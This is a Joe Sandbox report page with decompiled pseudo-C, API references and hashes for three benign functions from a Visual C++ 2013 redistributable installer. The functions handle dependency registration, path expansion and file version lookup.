Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseHandle$ErrorLast$EventObjectSingleWait
String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
API String ID: 1206859064-226982402
Opcode ID: 5a77d6f0ac7946d5e305c4b4d0e45fffe005fde00cd87d4501fcd711ccfb5739
Instruction ID: 38772a28b2b2126c2a65f2316c46e781741ee294e217a2dbe532bd8b4f238bdb
Opcode Fuzzy Hash: 5a77d6f0ac7946d5e305c4b4d0e45fffe005fde00cd87d4501fcd711ccfb5739
Instruction Fuzzy Hash: C0318F72A20306EBDB209FA999C496FBAF4AF14351BA40A3DE345E3154E374A9009F50

Uniqueness

Uniqueness Score: -1.00%

Function 01293FCA Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 279
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E01293FCA(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, int _a8, int _a12, int _a16, int _a20, int _a24) {
				int _v8;
				int _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t119;
				short* _t120;
				intOrPtr _t121;
				signed int _t122;
				int _t127;
				signed int _t133;
				signed int _t135;
				short* _t136;
				int _t139;
				int _t140;
				int _t149;
				int _t150;
				int _t152;
				intOrPtr* _t155;
				intOrPtr* _t157;
				void* _t162;
				int _t164;
				intOrPtr* _t167;
				void* _t172;
				void* _t173;

				_t162 = __edx;
				_t152 = 0;
				_push(__esi);
				_t167 = _a4;
				_t164 = _a8;
				 *((intOrPtr*)(_t167 + 0x10)) = 1;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v24 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(_t164 + 0xc)) != 0 || _a12 == 4 ||  *_t167 == 3) {
					_t119 = 1;
				} else {
					_t119 = 0;
				}
				 *((intOrPtr*)(_t167 + 0x18)) = _t119;
				 *(_t167 + 0x1c) = _t152;
				_t120 =  *(_t164 + 0x40);
				if(_t120 != _t152) {
					__eflags =  *_t120 - _t152;
					if( *_t120 == _t152) {
						goto L9;
					}
					goto L8;
				} else {
					_t120 =  *(_t164 + 0x10);
					L8:
					_v12 = _t120;
					L9:
					_t121 =  *_t167;
					if(_t121 != 4) {
						__eflags =  *((intOrPtr*)(_t164 + 0x2c)) - _t152;
						if( *((intOrPtr*)(_t164 + 0x2c)) != _t152) {
							L47:
							_a24 = 1;
							L48:
							__eflags = _t121 - 7;
							if(_t121 != 7) {
								L50:
								_t122 = E012B5710( *((intOrPtr*)(_t164 + 0x54)), _t152);
								__eflags = _t122;
								if(_t122 != 0) {
									__eflags =  *_t167 - 7;
									if( *_t167 == 7) {
										_t74 = _t167 + 0x14;
										 *_t74 =  *(_t167 + 0x14) | 0x00000002;
										__eflags =  *_t74;
									}
									L54:
									 *(_t167 + 0x14) =  *(_t167 + 0x14) | 0x00000004;
									 *(_t167 + 0x38) = 1;
									_a20 = _t152;
									__eflags =  *((intOrPtr*)(_t164 + 0xb8)) - _t152;
									if( *((intOrPtr*)(_t164 + 0xb8)) <= _t152) {
										L64:
										__eflags = _v12 - _t152;
										if(_v12 == _t152) {
											L73:
											if(_v16 != _t152) {
												E012B6DCE(_t164, _v16);
											}
											if(_v24 != _t152) {
												E012B7FDD(_v24, _v20);
											}
											return _v8;
										}
										__eflags =  *(_t164 + 0x40) - _t152;
										if( *(_t164 + 0x40) != _t152) {
											L67:
											__eflags = E0129EEAA(1, _t164, _v12);
											if(__eflags != 0) {
												goto L73;
											}
											_t127 = E01293865(_t162, _t167, __eflags, 1, _v12,  *(_t164 + 0x10));
											_v8 = _t127;
											__eflags = _t127 - _t152;
											if(_t127 >= _t152) {
												goto L73;
											}
											_push("Failed to add registration action for self dependent.");
											L70:
											_push(_v8);
											L71:
											E012AFA86();
											L72:
											goto L73;
										}
										__eflags = _a24 - _t152;
										if(_a24 != _t152) {
											goto L73;
										}
										goto L67;
									}
									_a16 = _t152;
									do {
										_t155 =  *((intOrPtr*)(_t164 + 0xb4)) + _a16;
										__eflags =  *_t155 - 5;
										if( *_t155 != 5) {
											goto L62;
										}
										_a12 = 0;
										__eflags =  *(_t155 + 0xa0);
										if( *(_t155 + 0xa0) <= 0) {
											goto L62;
										}
										_a8 = 0;
										do {
											_t87 = _t155 + 0x9c; // 0xabec7d8d
											_t170 =  *_t87 + _a8;
											__eflags = E0129EEAA(1, _t164,  *( *_t87 + _a8));
											if(__eflags != 0) {
												goto L61;
											}
											_t89 = _t155 + 0x18; // 0x101
											_t133 = E01293865(_t162, _a4, __eflags, 1,  *_t170,  *_t89);
											_v8 = _t133;
											__eflags = _t133;
											if(_t133 < 0) {
												_push("Failed to add registration action for dependent related bundle.");
												L40:
												_push(_t133);
												E012AFA86();
												_t152 = 0;
												goto L72;
											}
											L61:
											_a12 = _a12 + 1;
											_a8 = _a8 + 0x10;
											_t97 = _t155 + 0xa0; // 0x8dababab
											__eflags = _a12 -  *_t97;
										} while (_a12 <  *_t97);
										L62:
										_a20 = _a20 + 1;
										_a16 = _a16 + 0xf8;
										__eflags = _a20 -  *((intOrPtr*)(_t164 + 0xb8));
									} while (_a20 <  *((intOrPtr*)(_t164 + 0xb8)));
									_t167 = _a4;
									_t152 = 0;
									__eflags = 0;
									goto L64;
								}
								L51:
								 *(_t167 + 0x14) =  *(_t167 + 0x14) | 0x00000003;
								goto L54;
							}
							_t135 = E012975C7();
							__eflags = _t135;
							if(_t135 == 0) {
								goto L51;
							}
							goto L50;
						}
						_a24 = _t152;
						__eflags =  *((intOrPtr*)(_t164 + 0x34)) - _t152;
						if( *((intOrPtr*)(_t164 + 0x34)) == _t152) {
							goto L48;
						}
						goto L47;
					}
					_t136 =  *(_t164 + 0xbc);
					if(_t136 == _t152) {
						L13:
						_push( *(_t164 + 0xbc));
						E01281566(2, 0xa00000d1,  *((intOrPtr*)(_t164 + 0x44)));
						_t173 = _t173 + 0x10;
						L14:
						_t139 = E012B6D14( &_v16, 5, 1);
						_v8 = _t139;
						if(_t139 >= _t152) {
							__eflags = _v12 - _t152;
							if(_v12 == _t152) {
								L23:
								__eflags = _a16 - 2;
								if(_a16 == 2) {
									goto L73;
								}
								_t140 = _a20;
								__eflags = _t140 - _t152;
								if(_t140 == _t152) {
									L28:
									_a16 = _t152;
									__eflags =  *((intOrPtr*)(_t164 + 0xb8)) - _t152;
									if( *((intOrPtr*)(_t164 + 0xb8)) <= _t152) {
										L37:
										_t139 = E012B82FC(1, _t162,  *((intOrPtr*)(_t164 + 0x4c)),  *((intOrPtr*)(_t164 + 0x44)), _t152, _v16,  &_v24,  &_v20);
										_v8 = _t139;
										__eflags = _t139 - 0x80070002;
										if(_t139 != 0x80070002) {
											__eflags = _t139 - _t152;
											if(_t139 < _t152) {
												_push("Failed to check for remaining dependents during planning.");
												L16:
												_push(_t139);
												goto L71;
											}
											__eflags = _v20 - _t152;
											if(_v20 != _t152) {
												 *(_t167 + 0x1c) = 1;
												 *_a24 = _t152;
												E01281566(2, 0xa00000d2, _v20);
											}
											goto L73;
										}
										_v8 = _t152;
										goto L73;
									}
									_a12 = _t152;
									do {
										_t157 =  *((intOrPtr*)(_t164 + 0xb4)) + _a12;
										__eflags =  *_t157 - 5;
										if( *_t157 != 5) {
											goto L35;
										}
										_t172 = 0;
										__eflags =  *(_t157 + 0xa0);
										if(__eflags <= 0) {
											goto L35;
										}
										_a8 = 0;
										while(1) {
											_t42 = _t157 + 0x9c; // 0x565051f8
											_t133 = E0129F612(1, _t162, __eflags, _v16,  *((intOrPtr*)( *_t42 + _a8)));
											_v8 = _t133;
											__eflags = _t133;
											if(_t133 < 0) {
												break;
											}
											_a8 = _a8 + 0x10;
											_t172 = _t172 + 1;
											_t48 = _t157 + 0xa0; // 0x11a09e8
											__eflags = _t172 -  *_t48;
											if(__eflags < 0) {
												continue;
											}
											goto L35;
										}
										_push("Failed to add dependent bundle provider key to ignore dependents.");
										goto L40;
										L35:
										_a16 = _a16 + 1;
										_a12 = _a12 + 0xf8;
										__eflags = _a16 -  *((intOrPtr*)(_t164 + 0xb8));
									} while (_a16 <  *((intOrPtr*)(_t164 + 0xb8)));
									_t167 = _a4;
									_t152 = 0;
									__eflags = 0;
									goto L37;
								}
								__eflags =  *_t140 - _t152;
								if(__eflags == 0) {
									goto L28;
								}
								_t139 = E0129F612(1, _t162, __eflags, _v16, _t140);
								_v8 = _t139;
								__eflags = _t139 - _t152;
								if(_t139 >= _t152) {
									goto L28;
								}
								_push("Failed to add dependents ignored from command-line.");
								goto L16;
							}
							__eflags = E0129EEAA(1, _t164, _v12);
							if(__eflags == 0) {
								goto L23;
							}
							_t139 = E01293865(_t162, _t167, __eflags, 2, _v12,  *(_t164 + 0x10));
							_v8 = _t139;
							__eflags = _t139 - _t152;
							if(__eflags >= 0) {
								_t149 = E0129F612(1, _t162, __eflags, _v16, _v12);
								_v8 = _t149;
								__eflags = _t149 - _t152;
								if(_t149 >= _t152) {
									goto L23;
								}
								_push("Failed to add self-dependent to ignore dependents.");
								goto L70;
							}
							_push("Failed to allocate registration action.");
							goto L16;
						}
						_push("Failed to create the string dictionary.");
						goto L16;
					}
					_t150 = CompareStringW(_t152, 1,  *(_t164 + 0x10), 0xffffffff, _t136, 0xffffffff);
					_push(2);
					_pop(1);
					if(_t150 != 1) {
						goto L13;
					}
					 *(_t167 + 0x38) = 1;
					goto L14;
				}
			}

0x01293fca
0x01293fd1
0x01293fd3
0x01293fd4
0x01293fdb
0x01293fde
0x01293fe1
0x01293fe4
0x01293fe7
0x01293fea
0x01293fed
0x01293ff3
0x01294004
0x01294000
0x01294000
0x01294000
0x01294006
0x01294009
0x0129400c
0x01294011
0x01294018
0x0129401b
0x00000000
0x00000000
0x00000000
0x01294013
0x01294013
0x0129401d
0x0129401d
0x01294020
0x01294020
0x01294025
0x012941dd
0x012941e0
0x012941ea
0x012941ea
0x012941ed
0x012941ed
0x012941f0
0x012941fb
0x012941ff
0x01294204
0x01294206
0x0129420e
0x01294211
0x01294213
0x01294213
0x01294213
0x01294213
0x01294217
0x01294217
0x0129421b
0x01294222
0x01294225
0x0129422b
0x012942a9
0x012942a9
0x012942ac
0x012942e8
0x012942eb
0x012942f0
0x012942f0
0x012942fb
0x01294303
0x01294303
0x0129430c
0x0129430c
0x012942ae
0x012942b1
0x012942b8
0x012942c1
0x012942c3
0x00000000
0x00000000
0x012942cd
0x012942d2
0x012942d5
0x012942d7
0x00000000
0x00000000
0x012942d9
0x012942de
0x012942de
0x012942e1
0x012942e1
0x012942e6
0x00000000
0x012942e7
0x012942b3
0x012942b6
0x00000000
0x00000000
0x00000000
0x012942b6
0x0129422d
0x01294230
0x01294236
0x01294239
0x0129423c
0x00000000
0x00000000
0x01294240
0x01294243
0x01294249
0x00000000
0x00000000
0x0129424b
0x0129424e
0x0129424e
0x01294254
0x0129425f
0x01294261
0x00000000
0x00000000
0x01294263
0x0129426d
0x01294272
0x01294275
0x01294277
0x0129430f
0x01294196
0x01294196
0x01294197
0x0129419c
0x00000000
0x0129419c
0x0129427d
0x0129427d
0x01294283
0x01294287
0x01294287
0x01294287
0x0129428f
0x0129428f
0x01294295
0x0129429c
0x0129429c
0x012942a4
0x012942a7
0x012942a7
0x00000000
0x012942a7
0x01294208
0x01294208
0x00000000
0x01294208
0x012941f2
0x012941f7
0x012941f9
0x00000000
0x00000000
0x00000000
0x012941f9
0x012941e2
0x012941e5
0x012941e8
0x00000000
0x00000000
0x00000000
0x012941e8
0x0129402b
0x01294033
0x01294051
0x01294051
0x01294061
0x01294066
0x01294069
0x01294071
0x01294076
0x0129407b
0x01294088
0x0129408b
0x012940d1
0x012940d1
0x012940d5
0x00000000
0x00000000
0x012940db
0x012940de
0x012940e0
0x012940fe
0x012940fe
0x01294101
0x01294107
0x01294168
0x0129417a
0x0129417f
0x01294182
0x01294187
0x012941a3
0x012941a5
0x012941d3
0x01294082
0x01294082
0x00000000
0x01294082
0x012941a7
0x012941aa
0x012941bb
0x012941c4
0x012941c6
0x012941cb
0x00000000
0x012941aa
0x01294189
0x00000000
0x01294189
0x01294109
0x0129410c
0x01294112
0x01294115
0x01294118
0x00000000
0x00000000
0x0129411a
0x0129411c
0x01294122
0x00000000
0x00000000
0x01294124
0x01294127
0x01294127
0x01294135
0x0129413a
0x0129413d
0x0129413f
0x00000000
0x00000000
0x01294141
0x01294145
0x01294146
0x01294146
0x0129414c
0x00000000
0x00000000
0x00000000
0x0129414c
0x01294191
0x00000000
0x0129414e
0x0129414e
0x01294154
0x0129415b
0x0129415b
0x01294163
0x01294166
0x01294166
0x00000000
0x01294166
0x012940e2
0x012940e5
0x00000000
0x00000000
0x012940eb
0x012940f0
0x012940f3
0x012940f5
0x00000000
0x00000000
0x012940f7
0x00000000
0x012940f7
0x01294096
0x01294098
0x00000000
0x00000000
0x012940a2
0x012940a7
0x012940aa
0x012940ac
0x012940bb
0x012940c0
0x012940c3
0x012940c5
0x00000000
0x00000000
0x012940c7
0x00000000
0x012940c7
0x012940ae
0x00000000
0x012940ae
0x0129407d
0x00000000
0x0129407d
0x0129403f
0x01294045
0x01294047
0x0129404a
0x00000000
0x00000000
0x0129404c
0x00000000
0x0129404c

APIs

CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,01281317,01281717,01281333,012816FB,?,0128139F,01281717,012815CF,012813CF), ref: 0129403F

Strings

Failed to add dependent bundle provider key to ignore dependents., xrefs: 01294191
Failed to add self-dependent to ignore dependents., xrefs: 012940C7
Failed to add dependents ignored from command-line., xrefs: 012940F7
Failed to create the string dictionary., xrefs: 0129407D
Failed to add registration action for self dependent., xrefs: 012942D9
Failed to check for remaining dependents during planning., xrefs: 012941D3
Failed to allocate registration action., xrefs: 012940AE
Failed to add registration action for dependent related bundle., xrefs: 0129430F

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CompareString
String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.
API String ID: 1825529933-2086987450
Opcode ID: 4081de2be690b84f396607d88b39f72bee5053fa4cfdd3e1ddc8b520d237cd2e
Instruction ID: 174406001e9598b733fa9458d70d29afd86471412279d1321e4d884a016f0bb2
Opcode Fuzzy Hash: 4081de2be690b84f396607d88b39f72bee5053fa4cfdd3e1ddc8b520d237cd2e
Instruction Fuzzy Hash: 1DB17F70A20347EFDF25EFACCA816AEBBB4FF14304F10456EEA15A6111D371A691CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012B1B10 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E012B1B10(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12) {
				signed int _v8;
				long _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				WCHAR* _t52;
				signed int _t61;
				long _t72;
				long _t81;
				long _t82;
				void* _t83;
				void* _t84;
				signed int _t88;

				_t84 = __edx;
				_t83 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t81 = 0x40;
				if((_a12 & 0x00000001) == 0) {
					L23:
					_t52 = _v8;
					if((_a12 & 0x00000002) == 0) {
						_v8 = _v8 & 0x00000000;
						_v16 = _t52;
						goto L52;
					} else {
						_v20 = _v20 & 0x00000000;
						if(_t52 == 0) {
							_t52 = _a8;
						}
						_a12 = _t52;
						if(_v12 > _t81) {
							_t81 = _v12;
						}
						_t88 = E012B00D8( &_v16, _t81);
						if(_t88 >= 0) {
							_t61 = GetFullPathNameW(_a12, _t81, _v16,  &_v20);
							if(_t61 != 0) {
								if(_t81 >= _t61) {
									L48:
									if(_t61 <= 0x104) {
										L52:
										_t53 = _v16;
										if(_v16 == 0) {
											_t53 = _a8;
										}
										_t88 = E012B1171(_t83, _t84, _a4, _t53, 0);
									} else {
										_t88 = E012B19CF( &_v16);
										if(_t88 >= 0) {
											goto L52;
										}
									}
								} else {
									_t82 = _t61;
									if(_t61 >= 0x104) {
										_t36 = _t61 + 7; // 0x7
										_t82 = _t36;
									}
									_t88 = E012B00D8( &_v16, _t82);
									if(_t88 >= 0) {
										_t61 = GetFullPathNameW(_a12, _t82, _v16,  &_v20);
										if(_t61 != 0) {
											if(_t82 >= _t61) {
												goto L48;
											} else {
												_t88 = 0x8007007a;
												_push(0x8007007a);
												_push(0x130);
												goto L47;
											}
										} else {
											_t61 = GetLastError();
											if(_t61 > 0) {
												_t61 = _t61 & 0x0000ffff | 0x80070000;
											}
											_t88 = _t61;
											if(_t88 >= 0) {
												_t88 = 0x80004005;
											}
											_push(_t88);
											_push(0x12b);
											goto L47;
										}
									}
								}
							} else {
								_t61 = GetLastError();
								if(_t61 > 0) {
									_t61 = _t61 & 0x0000ffff | 0x80070000;
								}
								_t88 = _t61;
								if(_t88 >= 0) {
									_t88 = 0x80004005;
								}
								_push(_t88);
								_push(0x120);
								goto L47;
							}
						}
					}
				} else {
					_v12 = _t81;
					_t88 = E012B00D8( &_v8, _t81);
					if(_t88 >= 0) {
						_t72 = ExpandEnvironmentStringsW(_a8, _v8, _v12);
						if(_t72 != 0) {
							if(_v12 >= _t72) {
								L18:
								if(_t72 <= 0x104) {
									goto L23;
								} else {
									_t88 = E012B19CF( &_v8);
									if(_t88 == 0x80070057) {
										_t88 = 0;
									}
									if(_t88 >= 0) {
										_t88 = E012B018E(_v8,  &_v12);
										if(_t88 >= 0) {
											goto L23;
										}
									}
								}
							} else {
								_v12 = _t72;
								_t88 = E012B00D8( &_v8, _t72);
								if(_t88 >= 0) {
									_t72 = ExpandEnvironmentStringsW(_a8, _v8, _v12);
									if(_t72 != 0) {
										if(_v12 >= _t72) {
											goto L18;
										} else {
											_t88 = 0x8007007a;
											_push(0x8007007a);
											_push(0xff);
											goto L47;
										}
									} else {
										_t61 = GetLastError();
										if(_t61 > 0) {
											_t61 = _t61 & 0x0000ffff | 0x80070000;
										}
										_t88 = _t61;
										if(_t88 >= 0) {
											_t88 = 0x80004005;
										}
										_push(_t88);
										_push(0xfa);
										goto L47;
									}
								}
							}
						} else {
							_t61 = GetLastError();
							if(_t61 > 0) {
								_t61 = _t61 & 0x0000ffff | 0x80070000;
							}
							_t88 = _t61;
							if(_t88 >= 0) {
								_t88 = 0x80004005;
							}
							_push(_t88);
							_push(0xef);
							L47:
							_push("pathutil.cpp");
							E012B294E(_t61);
						}
					}
				}
				if(_v16 != 0) {
					E012B01E8(_v16);
				}
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				return _t88;
			}

0x012b1b10
0x012b1b10
0x012b1b21
0x012b1b24
0x012b1b27
0x012b1b2a
0x012b1b2b
0x012b1c2b
0x012b1c2f
0x012b1c32
0x012b1d2f
0x012b1d33
0x00000000
0x012b1c38
0x012b1c38
0x012b1c3e
0x012b1c40
0x012b1c40
0x012b1c43
0x012b1c49
0x012b1c4b
0x012b1c4b
0x012b1c58
0x012b1c5c
0x012b1c73
0x012b1c77
0x012b1ca2
0x012b1d17
0x012b1d1c
0x012b1d36
0x012b1d36
0x012b1d3b
0x012b1d3d
0x012b1d3d
0x012b1d4b
0x012b1d1e
0x012b1d27
0x012b1d2b
0x00000000
0x012b1d2d
0x012b1d2b
0x012b1ca4
0x012b1ca4
0x012b1cab
0x012b1cad
0x012b1cad
0x012b1cad
0x012b1cba
0x012b1cbe
0x012b1ccf
0x012b1cd3
0x012b1cfe
0x00000000
0x012b1d00
0x012b1d00
0x012b1d05
0x012b1d06
0x00000000
0x012b1d06
0x012b1cd5
0x012b1cd5
0x012b1cdd
0x012b1ce4
0x012b1ce4
0x012b1ce9
0x012b1ced
0x012b1cef
0x012b1cef
0x012b1cf4
0x012b1cf5
0x00000000
0x012b1cf5
0x012b1cd3
0x012b1cbe
0x012b1c79
0x012b1c79
0x012b1c81
0x012b1c88
0x012b1c88
0x012b1c8d
0x012b1c91
0x012b1c93
0x012b1c93
0x012b1c98
0x012b1c99
0x00000000
0x012b1c99
0x012b1c77
0x012b1c5c
0x012b1b31
0x012b1b36
0x012b1b3e
0x012b1b42
0x012b1b57
0x012b1b5b
0x012b1b8a
0x012b1bf1
0x012b1bf6
0x00000000
0x012b1bf8
0x012b1c01
0x012b1c09
0x012b1c0b
0x012b1c0b
0x012b1c0f
0x012b1c21
0x012b1c25
0x00000000
0x00000000
0x012b1c25
0x012b1c0f
0x012b1b8c
0x012b1b8d
0x012b1b99
0x012b1b9d
0x012b1bac
0x012b1bb0
0x012b1bdf
0x00000000
0x012b1be1
0x012b1be1
0x012b1be6
0x012b1be7
0x00000000
0x012b1be7
0x012b1bb2
0x012b1bb2
0x012b1bba
0x012b1bc1
0x012b1bc1
0x012b1bc6
0x012b1bca
0x012b1bcc
0x012b1bcc
0x012b1bd1
0x012b1bd2
0x00000000
0x012b1bd2
0x012b1bb0
0x012b1b9d
0x012b1b5d
0x012b1b5d
0x012b1b65
0x012b1b6c
0x012b1b6c
0x012b1b71
0x012b1b75
0x012b1b77
0x012b1b77
0x012b1b7c
0x012b1b7d
0x012b1d0b
0x012b1d0b
0x012b1d10
0x012b1d10
0x012b1b5b
0x012b1b42
0x012b1d51
0x012b1d56
0x012b1d56
0x012b1d5f
0x012b1d64
0x012b1d64
0x012b1d6f

APIs

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,00000040,76C84160,?,00000002), ref: 012B1B57
GetLastError.KERNEL32 ref: 012B1B5D
ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,00000000), ref: 012B1BAC
GetLastError.KERNEL32 ref: 012B1BB2
GetFullPathNameW.KERNEL32(00000000,00000040,?,00000000,?,00000040,76C84160,?,00000002), ref: 012B1C73
GetLastError.KERNEL32 ref: 012B1C79
GetFullPathNameW.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 012B1CCF
GetLastError.KERNEL32 ref: 012B1CD5

Strings

pathutil.cpp, xrefs: 012B1D0B

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
String ID: pathutil.cpp
API String ID: 1547313835-741606033
Opcode ID: 0a3ca759f3fe14965376993a6403cabaae53c2494a6deb6ee6aa02ff70a0be20
Instruction ID: 206c4297bb34d9293ce1184be5638b68666da8587edc647a7b6c1c740ca5dd44
Opcode Fuzzy Hash: 0a3ca759f3fe14965376993a6403cabaae53c2494a6deb6ee6aa02ff70a0be20
Instruction Fuzzy Hash: A561BA72D2021BEBDB21AAA4DCD4BEE7AB89F107D0F154565EA00F7150E375DE208790

Uniqueness

Uniqueness Score: -1.00%

Function 012B5C53 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97
memoryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E012B5C53(short* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				int _t22;
				void* _t23;
				void* _t28;
				void* _t32;
				void* _t43;

				_t43 = 0;
				_v12 = 0;
				_v16 = 0;
				_v24 = 0;
				_t22 = GetFileVersionInfoSizeW(_a4,  &_v12);
				_v8 = _t22;
				if(_t22 != 0) {
					L6:
					_t23 = GlobalAlloc(0, _v8);
					_v20 = _t23;
					if(_t23 != 0) {
						if(GetFileVersionInfoW(_a4, _v12, _v8, _t23) != 0) {
							L13:
							if(VerQueryValueW(_v20, "\\",  &_v16,  &_v24) != 0) {
								L19:
								_t28 = _v16;
								 *_a8 =  *((intOrPtr*)(_t28 + 8));
								 *_a12 =  *((intOrPtr*)(_t28 + 0xc));
							} else {
								_t32 = GetLastError();
								if(_t32 > 0) {
									_t32 = _t32 & 0x0000ffff | 0x80070000;
								}
								_t43 = _t32;
								if(_t43 >= 0) {
									goto L19;
								} else {
									_push(_t43);
									_push(0x125);
									goto L18;
								}
							}
						} else {
							_t32 = GetLastError();
							if(_t32 > 0) {
								_t32 = _t32 & 0x0000ffff | 0x80070000;
							}
							_t43 = _t32;
							if(_t43 >= 0) {
								goto L13;
							} else {
								_push(_t43);
								_push(0x120);
								L18:
								_push("fileutil.cpp");
								E012B294E(_t32);
							}
						}
						GlobalFree(_v20);
					} else {
						_t43 = 0x8007000e;
						_push(0x8007000e);
						_push(0x11c);
						goto L5;
					}
				} else {
					_t23 = GetLastError();
					if(_t23 > 0) {
						_t23 = _t23 & 0x0000ffff | 0x80070000;
					}
					_t43 = _t23;
					if(_t43 >= 0) {
						goto L6;
					} else {
						_push(_t43);
						_push(0x118);
						L5:
						_push("fileutil.cpp");
						E012B294E(_t23);
					}
				}
				return _t43;
			}

0x012b5c63
0x012b5c65
0x012b5c68
0x012b5c6b
0x012b5c6e
0x012b5c73
0x012b5c82
0x012b5cad
0x012b5cb2
0x012b5cb8
0x012b5cbd
0x012b5cdd
0x012b5cfb
0x012b5d12
0x012b5d3a
0x012b5d3a
0x012b5d43
0x012b5d4b
0x012b5d14
0x012b5d14
0x012b5d1c
0x012b5d20
0x012b5d20
0x012b5d22
0x012b5d26
0x00000000
0x012b5d28
0x012b5d28
0x012b5d29
0x00000000
0x012b5d29
0x012b5d26
0x012b5cdf
0x012b5cdf
0x012b5ce7
0x012b5ceb
0x012b5ceb
0x012b5ced
0x012b5cf1
0x00000000
0x012b5cf3
0x012b5cf3
0x012b5cf4
0x012b5d2e
0x012b5d2e
0x012b5d33
0x012b5d33
0x012b5cf1
0x012b5d50
0x012b5cbf
0x012b5cbf
0x012b5cc4
0x012b5cc5
0x00000000
0x012b5cc5
0x012b5c84
0x012b5c84
0x012b5c8c
0x012b5c90
0x012b5c90
0x012b5c92
0x012b5c96
0x00000000
0x012b5c98
0x012b5c98
0x012b5c99
0x012b5c9e
0x012b5c9e
0x012b5ca3
0x012b5ca3
0x012b5c96
0x012b5d5c

APIs

GetFileVersionInfoSizeW.VERSION(?,?,012D0B94,00000208,00000000,?,012AF7A5,?,?,?), ref: 012B5C6E
GetLastError.KERNEL32(?,?,012D0B94,00000208,00000000,?,012AF7A5,?,?,?), ref: 012B5C84
GlobalAlloc.KERNEL32(00000000,?,?,?,012D0B94,00000208,00000000,?,012AF7A5,?,?,?), ref: 012B5CB2
GetFileVersionInfoW.VERSION(?,?,?,00000000,?,012AF7A5,?,?,?), ref: 012B5CD6
GetLastError.KERNEL32(?,?,?,00000000,?,012AF7A5,?,?,?), ref: 012B5CDF
VerQueryValueW.VERSION(012AF7A5,012D0F74,?,?,?,?,?,00000000,?,012AF7A5,?,?,?), ref: 012B5D0B
GetLastError.KERNEL32(012AF7A5,012D0F74,?,?,?,?,?,00000000,?,012AF7A5,?,?,?), ref: 012B5D14
GlobalFree.KERNEL32 ref: 012B5D50

Strings

fileutil.cpp, xrefs: 012B5C9E, 012B5D2E

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$FileGlobalInfoVersion$AllocFreeQuerySizeValue
String ID: fileutil.cpp
API String ID: 2342464106-2967768451
Opcode ID: 90903c23cc646324661a9bbdeed849422e44d846833e1314c8f6a9d4f6ba70b1
Instruction ID: abf50354857cb3c29e502a2a6cdf75f1cc6c6068c116efa54c6556fb4f16a8cb
Opcode Fuzzy Hash: 90903c23cc646324661a9bbdeed849422e44d846833e1314c8f6a9d4f6ba70b1
